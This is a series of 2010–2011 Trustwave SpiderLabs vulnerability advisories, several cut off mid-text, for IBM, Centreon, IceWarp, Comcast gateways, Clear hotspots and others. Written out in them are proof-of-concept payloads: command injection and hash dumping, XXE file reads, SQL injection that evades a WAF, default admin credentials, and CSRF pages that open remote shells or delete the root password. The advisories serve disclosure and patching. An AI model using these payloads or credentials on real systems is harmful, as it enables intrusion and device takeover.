Trustwave's SpiderLabs Security Advisory TWSL2011-018: Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface https://www.trustwave.com/spiderlabs/advisories/TWSL2011-018.txt Published: 2011-12-20 Version: 1.0 Vendor: IBM (http://www.ibm.com) Product: TS3100/TS3200 Tape Library Version affected: Firmware less than A.60 Product description: Entry-level tape library designed to provide reliable,high capacity, high performance tape backup. The TS3100/TS3200 models and its storage management applications are designed to address capacity, performance, data protection, reliability, availability, affordability and application requirements. It is designed as a functionally rich, entry tape-storage solution incorporating LTO Ultrium tape technology. Credit: Martin Murfitt of Trustwave SpiderLabs Finding: Authentication Bypass (Web Management Console) CVE: CVE-2011-1372 The IBM TS3200/TS3200 Web User Interface is vulnerable to an authentication bypass attack. By sending a series of requests to the authentication function, it is possible to trigger a condition which causes the application to grant an access cookie which permits remote administration. Repeated queries using the following HTTP query arguments provided administrative access to the appliance after several tries: user_level=3password=aaalogin=Log+in' The password is not believed to be significant. Once access is granted, the following cookies are set on the client's browser: Cookie: RMU_LEVEL=3; RMU_LOGIN= Remediation Steps: Update firmware version to A.60 or above. Revision History: 1/17/11 - Vulnerability disclosed 11/18/11 - Patch released by vendor 12/20/11 - Advisory published References 1. http://www-03.ibm.com/systems/storage/tape/ts3200/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-017: Multiple Vulnerabilities in Merethis Centreon
Trustwave's SpiderLabs Security Advisory TWSL2011-017: Multiple Vulnerabilities in Merethis Centreon https://www.trustwave.com/spiderlabs/advisories/TWSL2011-017.txt Published: 2011-11-04 Version: 1.0 Vendor: Merethis (http://www.merethis.com and http://www.centreon.com) Product: Centreon Version affected: 2.3.1 and prior Product description: Centreon is network supervision and monitoring tool that is based upon the Nagios open source monitoring engine. Centreon can be used as a Nagios GUI and it can provide such features as real time system monitoring, performance management and system management. Credit: Christophe De La Fuente of Trustwave SpiderLabs Finding 1: Remote Command Execution Centreon supervision and monitoring tool provided by Merethis permits remote code execution from the command help web page allowing an attacker to execute arbitrary commands in the context of the webserver hosting the application. Any account that has been granted the access to Configuration Nagios Checks is able to execute commands. The following Proof of Concept (PoC) executes the command 'cat /etc/passwd': http://example.domain/centreon/main.php?p=60706command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23o=hmin=1 Finding 2: One-Way Hash Without a Salt The following code at lines 329-349 from www/include/configuration/nconfigObject/contact/DB-Func.php shows the insertContactInDB() function inserting the MD5 or SHA1 password hash in the database without using a salt: $rq = INSERT INTO `contact` ( . `contact_id` , `timeperiod_tp_id` , `timeperiod_tp_id2` , `contact_name` , . `contact_alias` , `contact_autologin_key` , `contact_passwd` , `contact_lang` , `contact_template_id`, . `contact_host_notification_options` , `contact_service_notification_options` , . `contact_email` , `contact_pager` , `contact_comment` , `contact_oreon`, `contact_register`, `contact_enable_notifications` , . `contact_admin` , `contact_type_msg`, `contact_activate`, `contact_auth_type`, . `contact_ldap_dn`, `contact_location`, `contact_address1`, `contact_address2`, . `contact_address3`, `contact_address4`, `contact_address5`, `contact_address6`) . VALUES ( ; $rq .= NULL, ; isset($ret[timeperiod_tp_id]) $ret[timeperiod_tp_id] != NULL ? $rq .= '.$ret[timeperiod_tp_id].', : $rq .= NULL, ; isset($ret[timeperiod_tp_id2]) $ret[timeperiod_tp_id2] != NULL ? $rq .= '.$ret[timeperiod_tp_id2].', : $rq .= NULL, ; isset($ret[contact_name]) $ret[contact_name] != NULL ? $rq .= '.htmlentities($ret[contact_name], ENT_QUOTES, UTF-8).', : $rq .= NULL, ;---isset($ret[contact_alias]) $ret[contact_alias] != NULL ? $rq .= '.htmlentities($ret[contact_alias], ENT_QUOTES, UTF-8).', : $rq .= NULL, ; isset($ret[contact_autologin_key]) $ret[contact_autologin_key] != NULL ? $rq .= '.htmlentities($ret[contact_autologin_key], ENT_QUOTES).', : $rq .= NULL, ; if ($encryptType == 1) isset($ret[contact_passwd]) $ret[contact_passwd] != NULL ? $rq .= '.md5($ret[contact_passwd]).', : $rq .= NULL, ; else if ($encryptType == 2) isset($ret[contact_passwd]) $ret[contact_passwd] != NULL ? $rq .= '.sha1($ret[contact_passwd]).', : $rq .= NULL, ; else isset($ret[contact_passwd]) $ret[contact_passwd] != NULL ? $rq .= '.md5($ret[contact_passwd]).', : $rq .= NULL, ; The combination of unsalted hashes and Finding 1 allows an attacker to recover passwords for all accounts. The following example illustrates this attack. The following php code will dump the hashes of all users: ?php require_once (/etc/centreon/centreon.conf.php); require_once $classdir/centreonDB.class.php; $p=new CentreonDB(); $r=$p-query(SELECT contact_passwd from centreon.contact); while ($w=$r-fetchRow()) {echo $w[contact_passwd] . br;} ? To upload and execute this code on the server, one method is to convert the above php code to hexadecimal and use the remote code execution method outlined in Finding 1 to create a server-side php file. The length of the URL accepted in this case is limited, so the file must be broken into three parts. The following requests create the php file test.php: http://example.domain/centreon/main.php?p=60706command_name=/Centreon/SNMP/../../../../usr/bin/printf%20\\x3c\\x3f\\x70\\x68\\x70\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x28\\x22\\x2f\\x65\\x74\\x63\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2e\\x63\\x6f\\x6e\\x66\\x2e\\x70\\x68\\x70\\x22\\x29\\x3b\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x22\\x24\\x63\\x6c\\x61\\x73\\x73\\x64\\x69\\x72\\x2f\\x63\\x65\\x6e\\x74%20|tee%20-a%20test.php%20%23o=hmin=1
TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation
Trustwave's SpiderLabs Security Advisory TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation https://www.trustwave.com/spiderlabs/advisories/TWSL2011-014.txt Published: 2011-09-23 Version: 1.0 Vendor: Pantech (http://www.pantechusa.com) Product: Link P7040P, others may be vulnerable Version affected: JLUS040201 confirmed, others may be vulnerable Product description: The Pantech Link is a mobile phone supporting a 2.4 LCD screen and full keyboard that facilitates simple text messaging. Credit: Paul Kehrer of Trustwave SpiderLabs Finding: Vulnerability in Pantech Web Browser SSL Implementation Pantech Link/P7040P browser SSL certificate parsing contains a flaw where it fails to check the Basic Constraints parameter of certificates in the chain. By signing a new certificate using a legitimate end entity certificate, an attacker can obtain a valid certificate for any domain. For example: -TrustedCA --somedomain.com (legitimate certificate) ---api.someotherdomain.com (signed by somedomain.com) Using this technique any SSL traffic using the api.someotherdomain.com certificate can be intercepted transparently to the end user if the attacker is in control of the network. Revision History: 08/12/11 - Vulnerability Disclosed 09/23/11 - Advisory Published Remediation Steps: This vulnerability has not been addressed at the time of this advisory. Mobile users should be aware of this issue and proceed with caution when transmitting SSL traffic. About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server
Trustwave's SpiderLabs Security Advisory TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt Published: 2011-09-23 Version: 1.0 Vendor: IceWarp (http://www.icewarp.com) Product: IceWarp Mail Server Version affected: 10.3.2 and below Product description: IceWarp WebMail is the web front-end for the IceWarp Mail Server, which provides email access on over 50,000 servers. IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection. Credit: David Kirkpatrick of Trustwave's SpiderLabs Finding 1: XML External Entity Injection CVE: CVE-2011-3579 An external entity is a function of the XML specification which allows XML documents to reference resources external to the XML document. This functionality forces the XML parser of the application to access the resource specified. In this case it is possible to inject an XML DOCTYPE SYSTEM directive to access local files on the operating system where the IceWarp server is installed. Using this technique it is possible to retrieve readable files on the operating system. This attack can also be used to create a possible denial of service condition. Proof-of-Concept: The following POST request was sent to the host A.B.C.D where the IceWarp mail server was running: REQUEST = POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:en-gb,en;q=0.5i've Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D Content-Length: 249 Content-Type: application/xml;charset=UTF-8 Pragma: no-cache Cache-Control: no-cache !DOCTYPE foo [!ENTITY xxeb91c4 SYSTEM file:///c:/windows/win.ini ]iq type=setquery xmlns=webmail:iq:authusernametestxxeb91c4;/usernamedigest828cd27c 6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33/digestmethodRSA/method /query/iq RESPONSE: == HTTP/1.1 200 OK Server: IceWarp/9.4.2 Date: Wed, 20 Jul 2011 10:04:56 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/xml Vary: Accept-Encoding Content-Length: 1113 ?xml version=1.0 encoding=utf-8?iq type=errorerror uid=login_invalidtest; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 TRUNCATED The above proof-of-concept would retrieve the c:\windows\win.ini file (the response in this example has been truncated). Finding 2: PHP Information Disclosure CVE: CVE-2011-3580 It is possible to retrieve the PHP information file phpinfo() by accessing the following URL http://A.B.C.D/server where A.B.C.D is the IP of the server running the IceWarp software. The response will be a page detailing the PHP version used and the configuration settings of PHP, including system details. Vendor Response: These issues have been addressed as of version 10.3.3 Remediation Steps: Customers should update to the latest version of IceWarp Mail Server in order to address these issues. The above issues have been corrected in version 10.3.3. Revision History: 08/03/11 - Vulnerability disclosed 09/19/11 - Patch released 09/23/11 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this
TWSL2011-008: Focus Stealing Vulnerability in Android
Trustwave's SpiderLabs Security Advisory TWSL2011-008: Focus Stealing Vulnerability in Android https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt Published: 2011-08-06 Version: 1.0 Vendor: Google http://www.android.com/ Product: Android Versions affected: Tested on 2.1 - 2.3 Other versions may also be affected Product description: Android is an open-source software stack for mobile devices which includes an operating system, key applications, and middleware. The Android mobile operating system is based on a modified version of the Linux kernel. Android is currently owned and developed by Google. Credit: Sean Schulte of Trustwave Finding 1: Covert Focus Stealing Android uses Intents and Activities such that the preferred application is always used for any given content/context. For example, a URL can always be opened with the Browser, and an image can be opened with the Gallery, Gmail or Twitter. To make this seamless for the user, switching between Activities always uses the same animation, whether the Activity belongs to the same app or a different app. Additionally, a service running in the background is able to 1) determine which app is currently running in the foreground, and 2) display an Activity defined in its own app (ie, not the current foreground app). These two features combine to allow a malicious developer to run a service that looks for apps it knows how to attack, and display a login screen to the user when those apps run. For example, when the user opens an app which requires a login, the malicious service displays a screen that looks identical to the legitimate login screen. Android gives no indication that the login screen actually belongs to a different app, and the Activity-switching animation would be the same whether the real app had legitimately displayed its login screen. In the case of a pixel-perfect malicious login screen, the user would have no visual indication that the focus has switched from the legitimate screen. When the user supplies his credentials, they can be sent to a remote server, allowing the attacker to steal the user's credentials without his knowledge. Any app that supplies a login screen is vulnerable to this attack. Remediation Steps: This vulnerability has not been fixed at the time of this advisory. As an alternative solution, users should be cautious when downloading third-party applications. Because of the nature of the vulnerability, a malicious application must be installed for a user to be vulnerable. Revision History: 03/18/11 - Vulnerability Disclosed to Google 07/08/11 - Publication/Disclosure Discussed with Vendor 08/06/11 - Advisory Published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If
TWSL2011-007: iOS SSL Implementation Does Not Validate Certificate Chain
Trustwave's SpiderLabs Security Advisory TWSL2011-007: iOS SSL Implementation Does Not Validate Certificate Chain https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt Published: 2011-07-25 Version: 1.0 Vendor: Apple (http://www.apple.com) Product: iOS Version affected: Versions Prior to 5.0b4, 4.3.5, and 4.2.10 Product description: iOS is Apple's mobile operating system for the iPhone, iPod Touch, and iPad hardware platforms. Credit: Paul Kehrer of Trustwave Finding: iOS SSL Implementation Does Not Validate Certificate Chain CVE: CVE-2011-0228 iOS's SSL certificate parsing contains a flaw where it fails to check the basicConstraints parameter of certificates in the chain. By signing a new certificate using a legitimate end entity certificate, an attacker can obtain a valid certificate for any domain. For example: -TrustedCA --somedomain.com (legitimate certificate) ---api.someotherdomain.com (signed by somedomain.com) Using this technique any SSL traffic using the api.someotherdomain.com certificate can be intercepted and decrypted by the issuer. No notification of the invalid nature of the certificate is presented to the iOS user. This method allows for transparent man-in-the-middle attacks against encrypted iOS communications. Remediation Steps: Users should update to the latest version of iOS in order to address this issue. This vulnerability has been corrected in versions 5.0b4, 4.3.5, and 4.2.10. Revision History: 07/15/11 - Vulnerability Disclosed 07/25/11 - Patch Released 07/25/11 - Advisory Published References: 1. http://support.apple.com/kb/HT4824 2. http://support.apple.com/kb/HT4825 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-006: IBM Web Application Firewall Bypass
Trustwave's SpiderLabs Security Advisory TWSL2011-006: IBM Web Application Firewall Bypass https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt Published: 2011-06-21 Version: 1.0 Vendor: IBM Product: IBM Web Application Firewall These capabilities are included through SiteProtector 7.0 and later software within IBM Security Network IPS GX products, IBM Security Server Protection products, and IBM Security Multi-Function product lines during 2H of 2009. Versions affected: Tested against G400 IPS-G400-IB-1 (Intrusion Prevention Update: 2011-03-11 00:34:23 - version: 31.030) and GX4004 IPS-GX4004-IB-2 (Intrusion Prevention Update: 2011-03-10 23:49:15 - version: 31.030). Product description: IBM Web Application Firewall capabilities inside IBM IPS products complement IBM Security's portfolio of web application security offerings to deliver end-to-end Web application security solutions. Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs Finding: IBM Web Application Firewall Bypass The IBM Web Application Firewall can be evaded, allowing an attacker to exploit web vulnerabilities that the product intends to protect. The issue occurs when an attacker submits repeated occurrences of the same parameter. The example shown below uses the following environment: A web environment using Microsoft IIS, ASP .NET technology, Microsoft SQL Server 2000, being protected by the IBM Web Application Firewall. As expected, the following request will be identified and blocked (depending of configuration) by the IBM Web application firewall. http://sitename/find_ta_def.aspx?id=2571iid='; EXEC master..xp_cmdshell ping 10.1.1.3 -- IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter if multiple entries are part of the request. http://sitename/find_ta_def.aspx?id=2571iid='; EXEC master..xp_cmdshell iid= ping 10.1.1.3 -- IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of iid parameter, however it will include an comma , between them, resulting in the following output being sent to the database. '; EXEC master..xp_cmdshell , ping 10.1.1.3 -- The request above will be identified and blocked (depending of configuration) by IBM Web application firewall, because it appears that EXEC and xp_cmdshell trigger an attack pattern. However, it is possible to split all the spaces in multiple parameters. For example: http://sitename/find_ta_def.aspx?id=2571iid='; iid= EXEC iid= master..xp_cmdshell iid= ping 10.1.1.3 iid= -- The above request will bypass the affected IBM Web application firewall, resulting in the following output being sent to the database. '; , EXEC , master..xp_cmdshell , ping 10.1.1.3 , -- However, the above SQL code will not be properly executed because of the comma inserted on the SQL query, to solve this situation we will use SQL comments. http://sitename/find_ta_def.aspx?id=2571iid='; /*iid=1*/ EXEC /*iid=1*/ master..xp_cmdshell /*iid=1*/ ping 10.1.1.3 /*iid=1*/ -- The above request will bypass IBM Web application firewall, resulting in the following output being sent to the database, which is a valid and working SQL code. '; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ ping 10.1.1.3 /*,1*/ -- The above code will execute the ping command on the Microsoft Windows backend, assuming the application was running with administrative privileges. This attack class is also referenced sometimes as HTTP Pollution Attack, HTTP Parameter Pollution (HPP) and HTTP Parameter Concatenation. The exploitability of this issue depends of the infrastructure (WebServer, Development Framework Technology, etc) technology being used. Remediation Steps: IBM has released fixes to the above issue in the Super Tuesday patch released in June. Refer to the references section of the advisory for further information released by IBM. Revision History: 04/07/11 - Vulnerability disclosed 06/16/11 - Patch released 06/21/11 - Advisory published References: 1. http://www.iss.net/security_center/reference/vuln/HTTP_Parameter_Abuse.htm 2. http://xforce.iss.net/xforce/xfdb/67178 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and
TWSL2011-002:Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR)
Trustwave's SpiderLabs Security Advisory TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com) Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR Version affected: Versions prior to 1.4.0.49.2 Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination. Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs Finding 1: Static Credentials CVE: CVE-2011-0885 All SMCD3G-CCR gateways provided by Comcast have an administrative login of mso with the password of D0nt4g3tme. These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root). Finding 2: Cross Site Request Forgery (CSRF) CVE: CVE-2011-0886 SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http. The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information. ## smcd3g-csrf-poc.htm html body iframe src=./smcd3g-csrf-poc-1.htm width=1 height=1 /iframe iframe src=./smcd3g-csrf-poc-2.htm width=1 height=1 /iframe iframe src=./smcd3g-csrf-poc-3.htm width=1 height=1 /iframe /body /html ## smcd3g-csrf-poc-1.htm html body form action=http://10.1.10.1/goform/login; method=post name=tF input type=hidden name=user value=mso / input type=hidden name=pws value=D0nt4g3tme / /form script document.tF.submit(); /script /body /html ## smcd3g-csrf-poc-2.htm html body form action=http://10.1.10.1/goform/RemoteRange; name=RMangement method=post input type=hidden value=feat-admin-remote name=file input type=hidden value=admin/ name=dir input type=hidden name=RemoteRange value=0 / input type=hidden name=rm_access value=on / input type=hidden name=Remote0 value=0.0.0.0,0.0.0.0,1 / input type=hidden name=http_port value=8080 / input type=hidden name=http_enable value=on / input type=hidden name=http_flag value=1 / input type=hidden name=msoremote_enableCheck value=on / input type=hidden name=mso_remote_enable value=1 / input type=hidden name=remote_enable value=0 / input type=hidden name=https_enable value=on / input type=hidden name=https_port value=8181 / input type=hidden name=https_flag value=1 / input type=hidden name=telnet_enable value=on / input type=hidden name=telnet_port value=2323 / input type=hidden name=telnet_flag value=1 / input type=hidden name=Remote1= value= / /form /body /html script setTimeout(document.RMangement.submit(),4000); /script /body /html ## smcd3g-csrf-poc-3.htm html body form name=WanIPform action=http://10.1.10.1/goform/Basic; method=post input type=hidden value=feat-wan-ip name=file input type=hidden value=admin/ name=dir input type=hidden value=Fixed name=DNSAssign input type=hidden value=0 name=dhcpc_release input type=hidden value=0 name=dhcpc_renew input type=hidden value= name=domain_name input type=hidden value= name=WDn input type=hidden name=SysName value= / input type=hidden name=manual_dns_enable value=on / input type=hidden name=DAddr value=4.2.2.1 / input type=hidden name=DAddr0 value=4 / input type=hidden name=DAddr1 value=2 / input type=hidden name=DAddr2 value=2 / input type=hidden name=DAddr3 value=1 / input type=hidden name=PDAddr value=4.2.2.2 / input type=hidden name=PDAddr0 value=4 / input type=hidden name=PDAddr1 value=2 / input type=hidden name=PDAddr2 value=2 / input type=hidden name=PDAddr3 value=2 / /form script setTimeout(document.WanIPform.submit(),5000); /script /body /html If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be provided remote administration in to the gateway device include a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point. Finding 3: Weak Session Management CVE: CVE-2011-0887 SMCD3G-CCR gateways provided by Comcast utilize a
TWSL-2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities
Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt Published: 2010-12-10 Version: 1.0 Vendor: Clear (http://www.clear.com http://www.clear.com/) Products: iSpot / ClearSpot 4G (http://www.clear.com/devices) Versions affected: The observed behavior the result of a design choice, and may be present on multiple versions. The specific versions used during testing are given below. iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)] 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)] Firmware Version : 1.9.9.4 Hardware Version : R051.2 Device Name :IMW-C615W Device Manufacturer :INFOMARK (http://infomark.co.kr http://infomark.co.kr/) Product Description: iSpot and ClearSpot 4G are portable 4G devices, that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection. Credit: Matthew Jakubowski of Trustwave's SpiderLabs CVE: CVE-2010-4507 Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. The following examples will allow an attacker to enable remote access to the iSpot and ClearSpot 4G, and add their own account to the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information. Add new user: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_cmd_result input type=hidden name=cmd value=adduser -S jaku input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_resultcmd=adduser% 20-S%20jaku' Remove root password: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_cmd_result input type=hidden name=cmd value=passwd -d root input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_resultcmd=passwd%2 0-d%20root' Enable remote administration access: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_network_set input type=hidden name=enable_remote_access value=YES input type=hidden name=remote_access_port value=80 input type=submit 